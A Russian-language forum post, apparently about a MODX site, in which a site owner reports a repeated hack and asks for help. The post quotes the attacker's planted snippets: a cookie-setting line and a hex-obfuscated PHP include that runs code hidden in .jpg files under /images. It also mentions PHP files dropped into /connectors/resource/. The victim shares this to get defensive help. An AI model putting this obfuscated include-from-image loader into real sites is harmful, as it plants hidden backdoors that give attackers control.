Взломали

Добрый вечер.
Подскажите пожалуйста. Второй раз взламывают сайт, не знаю как бороться.

Кратко о взломе:
— не знаю каким образом но грузят две картинки на сайт в папку images
— в админке создают два снипета и чанки.
Содержимое обного из снипетов —

"setcookie('__utmr_cache','cut_',mktime(0,0,0,1,1,2020));"

Содержимое второго — хекс код инклуда этих картинок

include($_SERVER["\x44\x4f\x43U\x4dEN\x54_\x52\x4fOT"]."/i\x6da\x67\x65s/\x73\x69\x6d\x70l\x65.\x6ap\x67");include($_SERVER["D\x4f\x43UMEN\x54_\x52\x4f\x4fT"]."/im\x61ges/\x69\x6d\x67.\x6a\x70g");

Чанком подгружают эти снипеты.

При первом взломе грузили еще и php файлы в /connectors/resource/

Встречался кто с таким? И как с этим бороться?